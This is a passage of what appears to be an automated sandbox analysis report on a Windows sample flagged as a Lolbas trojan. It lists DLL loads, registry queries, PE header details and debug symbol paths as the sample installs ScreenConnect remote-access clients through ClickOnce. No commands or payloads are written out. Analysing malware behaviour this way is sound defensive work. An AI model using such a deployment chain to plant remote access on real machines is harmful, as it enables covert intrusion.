                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: certificate valid
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb(s( source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb> source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.Windows.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb%)Sw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb` source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdbROF source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: entService.pdbr source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.Core.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.pdb0 source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF42E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF056000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871339597.0000000000ED0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1831463096.0000000004FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1417484650.00000000004DD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEA8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871561986.0000000002592000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdbul:YGvd source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbH9 source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbl source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: HP+nXC:\Windows\ScreenConnect.ClientService.pdbP source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830358109.0000000000B78000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe) source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Configuration.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: @7n.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF42A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF052000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1831637718.00000000050B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: ?7nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdba3a source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP+n0C:\Windows\mscorlib.pdb\ source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF05A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF432000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1832015455.00000000056C2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: System.Core.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.pdb4 source: WER494D.tmp.dmp.13.dr
